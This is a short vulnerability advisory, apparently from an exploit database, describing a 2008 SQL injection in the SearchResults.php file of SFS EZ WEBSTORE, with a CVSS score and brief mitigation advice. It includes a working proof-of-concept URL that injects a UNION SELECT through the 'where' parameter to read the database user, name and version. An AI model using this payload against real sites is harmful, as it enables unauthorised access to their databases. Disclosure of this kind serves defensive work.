vendor:
SFS EZ WEBSTORE
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SFS EZ WEBSTORE
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
SFS EZ WEBSTORE remote sql inj
A SQL injection vulnerability exists in the SearchResults.php file of SFS EZ WEBSTORE, which allows an attacker to execute arbitrary SQL commands via the 'where' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The following example shows a request containing a malicious SQL statement: http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
Mitigation:
Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.